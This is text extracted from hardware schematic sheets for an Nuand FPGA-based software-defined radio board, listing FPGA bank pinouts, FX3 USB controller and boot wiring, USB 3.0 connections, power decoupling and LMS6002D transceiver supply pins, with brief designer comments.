LMS_TX_CLK LMS_RX_CLK_OUT LMS_PLLOUT 
LMS_TX_V1 LMS_TX_V2 
LMS_RX_V2 
LMS_RX_V1 LMS_SDIO 
LMS_SDO 
LMS_TXEN 
LMS_SEN LMS_RXEN 
LMS_SCLK LMS_RESET 
Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
4 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
4 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
4 14 Friday, January 04, 2013 R56 200 R56 200 BANK 7 
EP4CE15A115F484 U43J 
BANK 7 
EP4CE15A115F484 U43J 
B7_CLK8 A12 
B7_IO_A13_PADD11 A13 
B7_IO_A14_PADD9 A14 
B7_IO_A15_PADD5 A15 
B7_IO_A16 A16 
B7_IO_A17_PADD1 A17 
B7_IO_A18 A18 
B7_IO_A19 A19 
B7_IO_A20 A20 
B7_CLK9 B12 
B7_IO_B13_PADD12 B13 
B7_IO_B14_PADD10 B14 
B7_IO_B15_PADD6 B15 
B7_IO_B16 B16 
B7_IO_B17_PADD2 B17 
B7_IO_B18_PADD0 B18 
B7_IO_B19 B19 
B7_IO_B20 B20 
B7_IO_C13_PADD7 C13 
B7_IO_C15_VREF C15 
B7_IO_C17 C17 
B7_IO_C19 C19 
B7_IO_D13_PADD8 D13 
B7_IO_D15 D15 
B7_IO_D17_VREF D17 
B7_IO_D19 D19 
B7_IO_E11_PADD13 E11 
B7_IO_E12 E12 
B7_IO_E13_VREF E13 
B7_IO_E14_PADD3 E14 
B7_IO_E15 E15 
B7_IO_E16 E16 
B7_IO_F11_PADD14 F11 
B7_IO_F13_PADD4 F13 
B7_IO_F14 F14 
B7_IO_F15 F15 BANK 4 
EP4CE15A115F484 U43G 
BANK 4 
EP4CE15A115F484 U43G 
B4_IO_R16 R16 
B4_IO_T15 T15 
B4_IO_T16 T16 
B4_IO_U12 U12 
B4_IO_U14 U14 
B4_IO_V12_VREF V12 
B4_IO_V13 V13 
B4_IO_V14 V14 
B4_IO_V15 V15 
B4_IO_V16_VREF V16 
B4_IO_W13 W13 
B4_IO_W14_VREF W14 
B4_IO_W15 W15 
B4_IO_W17 W17 
B4_IO_Y13 Y13 
B4_IO_Y17 Y17 
B4_CLK13 AA12 
B4_IO_AA13 AA13 
B4_IO_AA14 AA14 
B4_IO_AA15 AA15 
B4_IO_AA16 AA16 
B4_IO_AA17 AA17 
B4_IO_AA18_VREF AA18 
B4_IO_AA19 AA19 
B4_IO_AA20 AA20 
B4_CLK12 AB12 
B4_IO_AB13 AB13 
B4_IO_AB14 AB14 
B4_IO_AB15 AB15 
B4_IO_AB16 AB16 
B4_IO_AB17 AB17 
B4_IO_AB18 AB18 
B4_IO_AB19 AB19 
B4_IO_AB20 AB20 R50 200 R50 200 BANK 5 
EP4CE15A115F484 U43H 
BANK 5 
EP4CE15A115F484 U43H 
B5_IO_M16 M16 
B5_IO_M19 M19 
B5_IO_M20 M20 
B5_IO_M21 M21 
B5_IO_M22 M22 
B5_IO_N18 N18 
B5_IO_N19_VREF N19 
B5_IO_N20 N20 
B5_IO_N21_DEV_CLRN N21 
B5_IO_N22_DEV_OE N22 
B5_IO_P20_VREF P20 
B5_IO_P21 P21 
B5_IO_P22 P22 
B5_IO_R17_VREF R17 
B5_IO_R19 R19 
B5_IO_R20 R20 
B5_IO_R21 R21 
B5_IO_R22 R22 
B5_IO_T17 T17 
B5_IO_T18 T18 
B5_CLK6 T21 
B5_CLK7 T22 
B5_IO_U20 U20 
B5_IO_U21 U21 
B5_IO_U22 U22 
B5_IO_V21 V21 
B5_IO_V22 V22 
B5_IO_W19_VREF W19 
B5_IO_W20 W20 
B5_IO_W21 W21 
B5_IO_W22 W22 
B5_IO_Y22 Y22 
B5_IO_AA21 AA21 J71 
PWR_HDR30 J71 
PWR_HDR30 1
2
3
430 
29 
28 
27 
26 5
25 6
7 24 
23 8
22 9
10 21 
20 11 
12 19 
18 13 
17 14 
16 15 31 
32 
R49 200 R49 200 BANK 6 
EP4CE15A115F484 U43I 
BANK 6 
EP4CE15A115F484 U43I 
B6_IO_B21_PADD21 B21 
B6_IO_B22_PADD22 B22 
B6_IO_C20_PADD20 C20 
B6_IO_C21 C21 
B6_IO_C22 C22 
B6_IO_D20_VREF D20 
B6_IO_D21 D21 
B6_IO_D22 D22 
B6_IO_E21_NOE E21 
B6_IO_E22_NWE E22 
B6_IO_F17 F17 
B6_IO_F19 F19 
B6_IO_F20_NAVD F20 
B6_IO_F21 F21 
B6_IO_F22 F22 
B6_IO_G18_PADD23 G18 
B6_CLK4 G21 
B6_CLK5 G22 
B6_IO_H18_VREF H18 
B6_IO_H19 H19 
B6_IO_H20 H20 
B6_IO_H21 H21 
B6_IO_H22 H22 
B6_IO_J18 J18 
B6_IO_J21 J21 
B6_IO_J22 J22 
B6_IO_K18 K18 
B6_IO_K19_VREF K19 
B6_IO_K21_CLKUSR K21 
B6_IO_K22_NCEO K22 
B6_IO_L21_CRC_ERROR L21 
B6_IO_L22_INIT_DONE L22 
R57 200 R57 200 
5
54
43
32
21
1D D
C C
B B
A AVCCIO_L_C4 defines the "left" banks of the C4 
VCCIO_R_C4 defines the "right" banks of the C4 
The left side goes to the FX3, and the right side g oes to the LMS. 
This power condition is for the 115KE part at 3A VCCINT @1.2V, MAX 3.1A
VCCA2P5 @ 2.5, MAX 0.1A
VCCIO @1.8V MAX 0.1A FPGA POWER 
330uF 
330uF VA2P5 VCCINT_C4 VCCIO_R_C4 VCCIO_L_C4 
VCCINT_C4 
VCCA_C4 
V1P2PLL_C4 V1P2PLL_C4 
VCCIO_L_C4 
VCCIO_R_C4 VCCINT_C4 V1P2 
VCCA_C4 VCCINT_C4 
Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
5 14 Thursday, November 08, 2012 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
5 14 Thursday, November 08, 2012 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
5 14 Thursday, November 08, 2012 C116 
4.7 uF C116 
4.7 uF 
C118 
4.7 uF C118 
4.7 uF C274 
470nF C274 
470nF 
C278 
470nF C278 
470nF C236 
DNP C236 
DNP 
+C298 
100uF 
Tantalum +C298 
100uF 
Tantalum 
1 2
C128 
4.7 uF C128 
4.7 uF 
C275 
470nF C275 
470nF +C299 
DNP 
Tantalum +C299 
DNP 
Tantalum 
1 2+C297 
100uF 
Tantalum +C297 
100uF 
Tantalum 
1 2
+C301 
DNP 
4V 
Tantalum +C301 
DNP 
4V 
Tantalum 
1 2+C300 
DNP 
Tantalum +C300 
DNP 
Tantalum 
1 2
EP4CE15A115F484 U43B 
EP4CE15A115F484 U43B 
GND A1 
GND A22 
GND C5 
GND C9 
GND C11 
GND C12 
GND C14 
GND C16 
GND D3 
GND E20 
GND F3 
GND G2 
GND G20 
GND H8 
GND J5 
GND J9 
GND J19 
GND K3 
GND K10 
GND K11 
GND K12 
GND K13 
GND L10 
GND L11 
GND L12 
GND L13 
GND L20 
GND M10 
GND M11 
GND M12 
GND M13 
GND N3 
GND N10 
GND N11 
GND N12 
GND N13 
GND P19 
GND U3 
GND V20 
GND W3 
GND Y5 
GND Y9 
GND Y11 
GND Y12 
GND Y16 
GND Y18 
GND Y20 
GND AA2 
GND AA22 
GND AB1 
GND AB22 
GNDA1 U5 
GNDA2 E18 
GNDA3 F5 
GNDA4 V18 GND_V15 C18 
GND_V15 D7 
GND_V15 D8 
GND_V15 H3 
GND_V15 R3 
GND_V15 T20 
GND_V15 Y15 
GND_V15 AB6 
GND_V115 E10 
GND_V115 F12 
GND_V115 F16 
GND_V115 G7 
GND_V115 G9 
GND_V115 G11 
GND_V115 G13 
GND_V115 G15 
GND_V115 G17 
GND_V115 H10 
GND_V115 H12 
GND_V115 H13 
GND_V115 H14 
GND_V115 H16 
GND_V115 J15 
GND_V115 K7 
GND_V115 K16 
GND_V115 L8 
GND_V115 L15 
GND_V115 M7 
GND_V115 N8 
GND_V115 N15 
GND_V115 N17 
GND_V115 P6 
GND_V115 P8 
GND_V115 P16 
GND_V115 R7 
GND_V115 R9 
GND_V115 R11 
GND_V115 R13 
GND_V115 R18 
GND_V115 T8 
GND_V115 T10 
GND_V115 T12 
GND_V115 T14 
GND_V115 U7 
GND_V115 U13 
GND_V115 U19 
GND_V115 V6 
GND_V115 Y21 C235 
1uF C235 
1uF C57 
4.7nF C57 
4.7nF C234 
10nF C234 
10nF C59 
DNP C59 
DNP 
C126 
4.7 uF C126 
4.7 uF 
C280 
470nF C280 
470nF C283 
DNP C283 
DNP 
C271 
4.7nF C271 
4.7nF 
C117 
4.7 uF C117 
4.7 uF 
C120 
4.7 uF C120 
4.7 uF C105 
4.7 uF C105 
4.7 uF C282 
100nF C282 
100nF 
C127 
4.7 uF C127 
4.7 uF L29 
MMZ1005S601C L29 
MMZ1005S601C C45 
22nF C45 
22nF C233 
22nF C233 
22nF 
+C302 
DNP 4V 
Tantalum +C302 
DNP 4V 
Tantalum 
1 2C281 
470nF C281 
470nF C276 
470nF C276 
470nF C58 
100nF C58 
100nF 
C125 
4.7 uF C125 
4.7 uF 
C119 
4.7 uF C119 
4.7 uF EP4CE15A115F484 U43A 
EP4CE15A115F484 U43A 
VCCA1 T6 
VCCA2 F18 
VCCA3 G6 
VCCA4 U18 
VCCD_PLL1 U6 
VCCD_PLL2 E17 
VCCD_PLL3 F6 
VCCD_PLL4 V17 VCCINT J8 
VCCINT J10 
VCCINT J11 
VCCINT J12 
VCCINT J13 
VCCINT J14 
VCCINT K9 
VCCINT K14 
VCCINT L9 
VCCINT L14 
VCCINT M9 
VCCINT M14 
VCCINT N9 
VCCINT P9 
VCCINT P10 
VCCINT P11 
VCCINT P12 
VCCINT P13 
VCCINT T13 
VCCINT U16 
VCCINT U17 
VCCINT_V115 G4 
VCCINT_V115 G8 
VCCINT_V115 G10 
VCCINT_V115 G12 
VCCINT_V115 G14 
VCCINT_V115 G16 
VCCINT_V115 H9 
VCCINT_V115 H11 
VCCINT_V115 H15 
VCCINT_V115 H17 
VCCINT_V115 J7 
VCCINT_V115 J16 
VCCINT_V115 J17 
VCCINT_V115 K8 
VCCINT_V115 K15 
VCCINT_V115 K17 
VCCINT_V115 L7 
VCCINT_V115 L16 
VCCINT_V115 M8 
VCCINT_V115 M15 
VCCINT_V115 N7 
VCCINT_V115 N14 
VCCINT_V115 N16 
VCCINT_V115 P7 
VCCINT_V115 P14 
VCCINT_V115 P15 
VCCINT_V115 P17 
VCCINT_V115 R6 
VCCINT_V115 R8 
VCCINT_V115 R10 
VCCINT_V115 R12 
VCCINT_V115 R14 
VCCINT_V115 R15 
VCCINT_V115 T7 
VCCINT_V115 T9 
VCCINT_V115 T11 
VCCINT_V115 U8 
VCCINT_V115 U15 
VCCINT_V115 V7 VCCIO1 D4 
VCCIO1 F4 
VCCIO1 K4 
VCCIO1_V15 H4 
VCCIO2 N4 
VCCIO2 U4 
VCCIO2 W4 
VCCIO2_V15 R4 
VCCIO3 W5 
VCCIO3 W9 
VCCIO3 W11 
VCCIO3 AB2 
VCCIO3_V15 AA6 
VCCIO4 W12 
VCCIO4 W16 
VCCIO4 W18 
VCCIO4 AB21 
VCCIO4_V15 Y14 
VCCIO5 P18 
VCCIO5 V19 
VCCIO5 Y19 
VCCIO5_V15 T19 
VCCIO6 E19 
VCCIO6 G19 
VCCIO6 L19 
VCCIO6_V15 J20 
VCCIO7 A21 
VCCIO7 D12 
VCCIO7 D14 
VCCIO7 D16 
VCCIO7_V15 D18 
VCCIO8 A2 
VCCIO8 D5 
VCCIO8 D9 
VCCIO8 D11 
VCCIO8_V15 E8 
5
54
43
32
21
1D D
C C
B B
A AIn 32-bit GPIF mode UART is (FX3 data pg 33): 
   GPIO[55](C2)=UART_TX 
   GPIO[56](D5]=UART_RX 
UART_CS was added to allow the FPGA to use the 
MISO/MOSI lines to communicate via UART with the FX 3. 
CS can also be deasserted to write to flash after b oot. 
FX3 datasheet pg 7: 
SPI+USB is primary, USB only should be achievable 
SPI+USB on failure - PMODE[2:0] = "0F1" 
USB boot           - PMODE[2:0] = "F11" PMODE[2..0] SPI Flash 
FLASH VCC : 1.65V ~ 2V FX3 GPIF + BOOT 
Digital 20mA SPI-MISO_UART-TX 
SPI-MOSI_UART-RX GPIF0 
GPIF4 
GPIF5 
GPIF6 
GPIF7 
GPIF8 
GPIF9 
GPIF10 
GPIF11 
GPIF12 
GPIF13 
GPIF14 
GPIF15 GPIF16 
GPIF17 
GPIF18 
GPIF19 
GPIF20 
GPIF21 
GPIF22 
GPIF23 
GPIF24 GPIF1 
GPIF25 
GPIF26 
GPIF27 GPIF28 
GPIF29 
GPIF30 
GPIF31 
FX3_PCLK GPIF2 
GPIF3 
FX3_CTL0 
FX3_CTL1 
FX3_CTL2 
FX3_CTL3 
FX3_CTL6 
FX3_CTL7 
FX3_CTL8 
FX3_CTL9 FX3_CTL4 
FX3_CTL5 
FX3_CTL10 
FX3_CTL12 FX3_CTL11 
PMODE0 
PMODE1 
PMODE2 PMODE0 PMODE1 PMODE2 SPI-MISO_UART-TX 
SPI_CLK 
SPI-SSN_UART-CS SPI-MOSI_UART-RX 
SPI_Hold#_flash 
SPI_Wp#_flash SPI-SSN_UART-CS SPI_CLK 
VIO1_FX VIO1_FX 
VIO4_FX VIO4_FX 
CVDDQ VIO1_FX FX3_UART_RX
FX3_UART_TX
FX3_PCLK GPIF0 
GPIF1 
GPIF5 GPIF4 
GPIF6 
GPIF7 
GPIF8 
GPIF9 
GPIF10 
GPIF11 
GPIF12 
GPIF13 
GPIF14 
GPIF15 GPIF16 
GPIF17 
GPIF18 
GPIF19 
GPIF20 
GPIF21 
GPIF22 
GPIF23 
GPIF24 
GPIF25 
GPIF26 
GPIF27 GPIF28 
GPIF29 
GPIF30 
GPIF31 GPIF2 
GPIF3 
FX3_CTL0 
FX3_CTL1 
FX3_CTL2 
FX3_CTL3 
FX3_CTL4 
FX3_CTL5 
FX3_CTL6 
FX3_CTL7 
FX3_CTL8 
FX3_CTL9 
FX3_CTL10 
FX3_CTL11 
FX3_CTL12 nFX3_UART_CSFX3_GPIO50 
FX3_GPIO51 
FX3_GPIO52 
Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
6 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
6 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
6 14 Friday, January 04, 2013 SEC 1/7 P - PORT VIO1 U2A 
FX3 SEC 1/7 P - PORT VIO1 U2A 
FX3 INT_N_CTL15 L8 DQ0 F10 
DQ1 F9 
DQ10 K11 
DQ11 L10 
DQ12 K10 
DQ13 K9 
DQ14 J8 
DQ15 G8 
PCLK J6 
CTL0 K8 
CTL1 K7 
CTL2 J7 DQ2 F7 
CTL3 H7 
CTL4 G7 
CTL5 G6 
CTL6 K6 
CTL7 H8 
CTL8 G5 
CTL9 H6 
CTL10 K5 
CTL11 J5 
CTL12 H5 DQ3 G10 
PMODE0 G4 
PMODE1 H4 
PMODE2 L4 DQ4 G9 
DQ5 F8 
DQ6 H10 
DQ7 H9 
DQ8 J10 
DQ9 J9 
RESET_N C5 R250 4.7K R250 4.7K 
R10 
DNP R10 
DNP R249 4.7K R249 4.7K R247 100K R247 100K 
TP11 TP11 U26 U26 
HOLD 7VCC 8
CS 1Q2
C6D5
VSS 4W/VPP 3R8 
DNP R8 
DNP R6 
10K R6 
10K 
R251 
DNP R251 
DNP C77 
0.1uF C77 
0.1uF 
R248 4.7K R248 4.7K TP10 TP10 
TP12 TP12 S1 - PORT 
SEC 3/7 VIO3 VIO4 U2C 
FX3 S1 - PORT 
SEC 3/7 VIO3 VIO4 U2C 
FX3 DQ28 F5 
DQ29 E1 
DQ30 E5 
DQ31 E4 
I2S-CLK D1 
I2S-SD D2 
I2S-WS D3 
UART-RTS_SPI-SCK D4 
UART-CTS_SPI-SSN C1 
UART-TX_SPI-MISO C2 
UART-RX_SPI-MOSI D5 
I2S-MCLK C4 
R7 
10K R7 
10K 
J68 
SWITCH J68 
SWITCH 
1
A
2BR9 
10K R9 
10K S0 - PORT 
SEC 2/7 VIO2 U2B 
FX3 S0 - PORT 
SEC 2/7 VIO2 U2B 
FX3 DQ16 K2 
DQ17 J4 
DQ18 K1 
DQ19 J2 
DQ20 J3 
DQ21 J1 
DQ22 H2 
DQ23 H3 
DQ24 F4 
DQ25 G2 
DQ26 G3 
DQ27 F3 
GPIO45 F2 
5
54
43
32
21
1D D
C C
B B
A AFX3 JTAG FX3 DEBUG + CLOCK SEL 
FX3 datasheet pg 8: 
38.4MHz input CLK - FSLC[2:0] = "110" FSLC[2..0] DEBUG TPs Debug LED 
FPGA Version Resistor 
N_SRST TCK 
RTCK TDI 
TDO TRST_N 
TMS TCK 
TDI 
TDO 
TMS 
TRST_N FX3_I2C_SCL 
FX3_I2C_SDA 
CHARGER_DETECT 
FSLC2 FSLC1 FSLC0 
FSLC2 
FSLC1 
FSLC0 FSLC0 
FSLC1 
FSLC2 
XTALIN 
XTALOUT 
CLKIN_32 CHARGER_DETECT FX3_I2C_SCL 
FX3_I2C_SDA VIO5_FX VIO5_FX CVDDQ CVDDQ 
FX3_CLK 
Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
7 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
7 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
7 14 Friday, January 04, 2013 JTAG_ICE_CONN J51 
JTAG_ICE_CONN J51 
VT_REF 1
N_TRST 3
TDI 5
TMS 7
TCK 9
RTCK 11 
TDO 13 
N_SRST 15 
DBGRQ 17 
DBGACK 19 V_SUPPLY 2
GND1 4
GND2 6
GND3 8
GND4 10 
GND5 12 
GND6 14 
GND7 16 
GND8 18 
GND9 20 C232 
0.01uF C232 
0.01uF R51 10K R51 10K R3 
10K R3 
10K 
TP2 TP2 R2 
10K R2 
10K R54 10K R54 10K R53 10K R53 10K R52 10K R52 10K SEC 6/7 MISC VIO5 U2F 
FX3 SEC 6/7 MISC VIO5 U2F 
FX3 I2C-GPIO58_SCL D9 
I2C-GPIO59_SDA D10 
I2C-GPIO60_CHARGER-DETECT D11 
TCK F6 
TDI E7 
TDO C10 
TMS E8 
TRST_N B11 R1 
10K R1 
10K 
TP3 TP3 R55 10K R55 10K D10 D10 
TP1 TP1 R310 
DNP R310 
DNP XTAL / CLK 
SEC 5/7 CVDDQ U2E 
FX3 XTAL / CLK 
SEC 5/7 CVDDQ U2E 
FX3 CLKIN D7 
CLKIN_32 D6 FSLC0 B2 
FSLC1 B4 
FSLC2 E6 
XTALIN C6 
XTALOUT C7 TP6 TP6 
5
54
43
32
21
1D D
C C
B B
A AUSB3.0  MICRO TYPE B 
ESD DEVICE USB Positive Overvoltage 
Protection Controller USB CONNECTIONS 
VBUS_IN 
OTG_ID SS_DM 
SS_TX_P SS_DP 
SS_TX_M 
SS_RX_M SS_RX_P 
OTG_ID 
SS_RX_M SS_RX_P 
SS_RX_M SS_RX_P SS_TX_M 
SS_TX_P SS_TX_M 
SS_TX_P SS_RX_P 
SS_RX_M USB3_VBUS 
FLAG VBUS_IN 
VBUS_IN SS_DP 
SS_DM OTG_ID 
SS_TX_P 
SS_TX_M 
USB3_VBUS VBUS_IN 
Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
8 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
8 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
8 14 Friday, January 04, 2013 TP7 TP7 L2 
BLM21PG221SN1D L2 
BLM21PG221SN1D 
C186 
1uF C186 
1uF J48 
USB_3 J48 
USB_3 VBUS 1
D- 2
D+ 3
ID 4
GND1 5
MICRO_SSTX- 6
MICRO_SSTX+ 7
GND2 8
MICRO_SSRX- 9
MICRO_SSRX+ 10 
SHIELD1 11 
SHIELD2 12 
SHIELD3 13 
SHIELD4 14 
SHIELD5 15 
SHIELD6 16 L5 
BLM21PG221SN1D L5 
BLM21PG221SN1D 
C185 
1uF C185 
1uF R48 6.04K / 1% R48 6.04K / 1% C43 0.1uF C43 0.1uF 
R47 200 / 1% R47 200 / 1% 
U9 
ESD Protector U9 
ESD Protector 8877
665544
33221110 10 
99SEC 4/7 U - PORT 
VBUS/ 
VBAT 
VBUS/ 
VBAT VBUS U2D 
FX3 SEC 4/7 U - PORT 
VBUS/ 
VBAT 
VBUS/ 
VBAT VBUS U2D 
FX3 DP A9 OTG_ID C9 
R_USB2 C8 
R_USB3 B3 SSRXM A3 SSRXP A4 
SSTXM A6 SSTXP A5 VBUS E11 
DM A10 
NC A11 
C4 0.1uF C4 0.1uF 
U37 
NCP361SNT1G 
PART_NUMBER = NCP361SNT1G 
Manufacturer = ON Semiconductor U37 
NCP361SNT1G 
PART_NUMBER = NCP361SNT1G 
Manufacturer = ON Semiconductor IN 1
GND 2OUT 5
FLAG 4EN_L 3C46 0.1uF C46 0.1uF 
R190 1M R190 1M 
5
54
43
32
21
1D D
C C
B B
A AU3RX_VDDQ = V1P2 
U3TX_VDDQ = V1P2 
AVDD      = V1P2 
CVDDQ     = V1P8 
VDD       = V1P2 
VIO1      = V1P8 
VIO2      = V1P8 
VIO3      = V1P8 
VIO4      = V1P8 
VIO5      = V1P8 U3RX_VDDQ 
U3TX_VDDQ AVDD VDD 
VIO1 VIO2 
VIO3 VIO4 VIO5 
CVDDQ FPGA VCCIO VDD+AVDD 1.2V@200mA 
U3VDDQ 1.8@60mA FX3 POWER 
Changed C103 from 2.2uF to 4.7uF VIO3_FX 
CVDDQ AVDD_FX 
VIO4_FX U3TX_VDDQ 
VIO1_FX VIO5_FX 
VIO2_FX 
U3RX_VDDQ VDD_FX 
VIO5_FX 
AVDD_FX 
U3TX_VDDQ VIO1_FX VDD_FX 
VIO4_FX VIO2_FX 
VIO3_FX 
U3RX_VDDQ 
V1P2 V1P2 
CVDDQ V1P2 V1P2 
VIO1_FX VCCIO_L_C4 VD3P3 
Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
9 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
9 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
9 14 Friday, January 04, 2013 FB4 
MPZ2012S601A FB4 
MPZ2012S601A C108 
0.1uF C108 
0.1uF C106 
0.1uF C106 
0.1uF 
C103 
4.7 uF C103 
4.7 uF FB6 
MPZ2012S601A FB6 
MPZ2012S601A C107 
0.01uF C107 
0.01uF C85 
0.01uF C85 
0.01uF 
C363 
22uF C363 
22uF C86 
0.1uF C86 
0.1uF 
C90 
0.01uF C90 
0.01uF C111 
0.01uF C111 
0.01uF C115 
0.01uF C115 
0.01uF C79 
0.1uF C79 
0.1uF 
C89 
0.1uF C89 
0.1uF C110 
0.1uF C110 
0.1uF 
C91 
0.1uF C91 
0.1uF C114 
0.1uF C114 
0.1uF 
C102 
0.1uF C102 
0.1uF 
C113 
0.01uF C113 
0.01uF FB7 
MPZ2012S601A FB7 
MPZ2012S601A 
FB8 
MPZ2012S601A FB8 
MPZ2012S601A 
FB5 
MPZ2012S601A FB5 
MPZ2012S601A 
C364 
22uF C364 
22uF C112 
0.1uF C112 
0.1uF C367 
22uF C367 
22uF 
C88 
0.01uF C88 
0.01uF C83 
0.1uF C83 
0.1uF 
C87 
0.1uF C87 
0.1uF C81 
0.01uF C81 
0.01uF C82 
0.01uF C82 
0.01uF C80 
0.1uF C80 
0.1uF 
FB9 
MPZ2012S601A FB9 
MPZ2012S601A C78 
0.1uF C78 
0.1uF 
C109 
0.01uF C109 
0.01uF SEC 7/7 POWER U2G 
FX3 SEC 7/7 POWER U2G 
FX3 AVDD A7 
AVSS B7 CVDDQ B6 VDD8 B10 VIO5 C11 
VIO4 B1 
VIO1_1 L9 
VIO1_2 H11 VIO2 F1 
VIO3 E3 VDD6 L5 
VDD7 J11 
U2AFEVSSQ B9 
U2PLLVSSQ B8 U3RXVDDQ A2 
U3TXVDDQ B5 
U3VSSQ A1 VBAT E10 
VDD1 H1 
VDD2 C3 
VDD3 L7 
VDD4 E9 
VDD5 F11 
VSS1 G1 
VSS2 L1 
VSS3 E2 
VSS4 L6 
VSS5 D8 
VSS6 G11 
VSS7 L11 
VSS8 K4 
VSS9 L3 
VSS10 K3 
VSS11 L2 
VSS12 A8 C84 
0.1uF C84 
0.1uF 
C104 
0.1uF C104 
0.1uF 
5
54
43
32
21
1D D
C C
B B
A APVDDAD33[A-D] are the 
ADC/DAC IO buf Vref pins PVDDVGG 
must be 3.3V Analog 1.8V Digital 1.8V 
PVDDSPI33 is a Vref for 
the SPI + PLLCLK. 
Pin 71,74 need split plane PLLCLK is Vref'd by PVDDSPI33 
Pin 34 is further away from the 
other pins so parts are replicated Analog 3.3V 
Analog 573.547mA 
22mA Digital 45.51mA Analog 40mA LMS DIGITAL Digital 1.8V 
Total 22mA 
ESD supply higher current 
Needs MPZ2012S601A LMS_TX_CLK 
LMS_TX_IQ_SEL 
LMS_TXD0 
LMS_TXD1 
LMS_TXD2 
LMS_TXD3 
LMS_TXD4 
LMS_TXD5 
LMS_TXD6 
LMS_TXD7 
LMS_TXD8 
LMS_TXD9 
LMS_TXD10 
LMS_TXD11 LMS_RXEN 
LMS_RX_CLK 
LMS_RX_IQ_SEL 
LMS_RXD0 
LMS_RXD1 
LMS_RXD2 
LMS_RXD3 
LMS_RXD4 
LMS_RXD5 
LMS_RXD6 
LMS_RXD7 
LMS_RXD8 
LMS_RXD9 
LMS_RXD10 
LMS_RXD11 
LMS_SEN 
LMS_SCLK 
LMS_SDIO 
LMS_SDO LMS_RESET RXVCCPLL18 RAVDD18 
TXVDDVCO18 
RXVDDVCO18 LMS_RX_CLK_OUT LMS_RESET LMS_TX_EN 
LMS_RXEN 
VCCIO_R_C4 V3P3_RX_LMS V3P3_TX_LMS VD1P8 
V3P3_TX_LMS 
VD3P3 VA1P8 
V3P3_TX_LMS
VCCIO_R_C4 V3P3_RX_LMS 
VCCIO_R_C4_CLK 
VD3P3 LMS_TXD1 
LMS_TXD2 
LMS_TXD3 LMS_TXD0 
LMS_TXD4 
LMS_TXD6 
LMS_TXD7 
LMS_TXD8 LMS_TXD5 
LMS_TXD9 LMS_TXEN 
LMS_TX_CLK 
LMS_TX_IQ_SEL 
LMS_TXD11 LMS_TXD10 
LMS_RESET 
LMS_SEN 
LMS_SCLK 
LMS_SDIO 
LMS_SDO LMS_RXD0 
LMS_RXD1 
LMS_RXD2 
LMS_RXD3 
LMS_RXD4 
LMS_RXD5 
LMS_RXD6 
LMS_RXD7 
LMS_RXD8 
LMS_RXD9 
LMS_RXD10 
LMS_RXD11 LMS_RX_IQ_SELLMS_RX_CLK LMS_RXEN 
LMS_RX_CLK_OUTLMS_CLK 
Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
10 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
10 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
10 14 Friday, January 04, 2013 C200 
100nF C200 
100nF C231 
0.01uF C231 
0.01uF 
L56 
MMZ1005S601C L56 
MMZ1005S601C C202 
100nF C202 
100nF C189 
100nF C189 
100nF L57 
MMZ1005S601C L57 
MMZ1005S601C L21 
MMZ0603S601C L21 
MMZ0603S601C L17 
MMZ0603S601C L17 
MMZ0603S601C 
L14 
MMZ0603S601C L14 
MMZ0603S601C TP14 TP14 
R308 
270 R308 
270 C247 
100nF C247 
100nF L10 
MMZ0603S601C L10 
MMZ0603S601C 
LMS6002D U1A 
LMS6002D U1A 
RDVDD18 33 
TXVCCPLL18 61 
TRXVDDDSM18 72 
VSPI18 73 
RXVCCPLL18 83 
RAVDD18 35 
TDVDD18 36 
TXVDDVCO18 60 
RXVDDVCO18 84 
TAVDD33 37 
PVDDSPI33 74 
PVDDAD33A 1PVDDVGG 7
PVDDAD33B 12 
PVDDAD33C 18 
PVDDAD33D 34 TXVCCLPF33 43 
TXVCCMIX33 45 
TXVCCDRV33 49 
TXPVDD33 47 
RXVCCMIX33 90 
RXVCCLNA33 101 
RXPVDD33 107 
RXVCCTIA33 109 
RXVCCLPF33 111 
RXVCCVGA33 112 
TXPVDDPLL33A 58 
TXPVDDPLL33B 62 
TXVCCVCO33 59 
TXVCCCHP33 63 
RXVCCCHP33 78 
RXVCCLOB33 79 
RXVCCVCO33 82 
RXVCCPLL33 85 
RXPVDDPLL33A 86 
RXPVDDPLL33B 81 
GLOBAL_GND 117 
L7 
MMZ0603S601C L7 
MMZ0603S601C C196 
100nF C196 
100nF 
R258 
150 R258 
150 R260 
22 R260 
22 
C193 
100nF C193 
100nF L30 
MMZ0603S601C L30 
MMZ0603S601C L19 
MMZ0603S601C L19 
MMZ0603S601C 
L15 
MMZ0603S601C L15 
MMZ0603S601C 
C187 
100nF C187 
100nF L11 
MMZ0603S601CL11 
MMZ0603S601C
R307 
270 R307 
270 C203 
1uF C203 
1uF 
L24 
MMZ0603S601C L24 
MMZ0603S601C L18 
MMZ0603S601C L18 
MMZ0603S601C 
C207 
1uF C207 
1uF C206 
10uF C206 
10uF 
L22 
MMZ0603S601C L22 
MMZ0603S601C R288 
100K R288 
100K C205 
10uF C205 
10uF L20 
MMZ0603S601C L20 
MMZ0603S601C 
C251 
1uF C251 
1uF C197 
100nF C197 
100nF 
C190 
